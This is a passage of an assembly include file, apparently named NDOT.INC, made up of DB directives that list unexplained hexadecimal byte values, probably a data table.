0E8H,0EFH,0D7H,008H,0EAH,00FH,009H,00FH,010H,006H,010H,012H,0B2H,012H,005H DB 04AH,005H,006H,006H,017H,00FH,007H,00CH,010H,05BH,002H,00EH,06FH,002H,004H DB 00FH,003H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,007H,010H,005H,07AH,005H DB 006H,007H,014H,00FH,008H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00BH,010H,005H,07AH,005H,006H,0FFH,01FH,00BH,018H,00FH,00CH,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,007H,010H,005H,07AH,005H,006H,007H,014H DB 00FH,008H,00FH,010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H ;----------------------------------(NDOT.INC)---------------------------------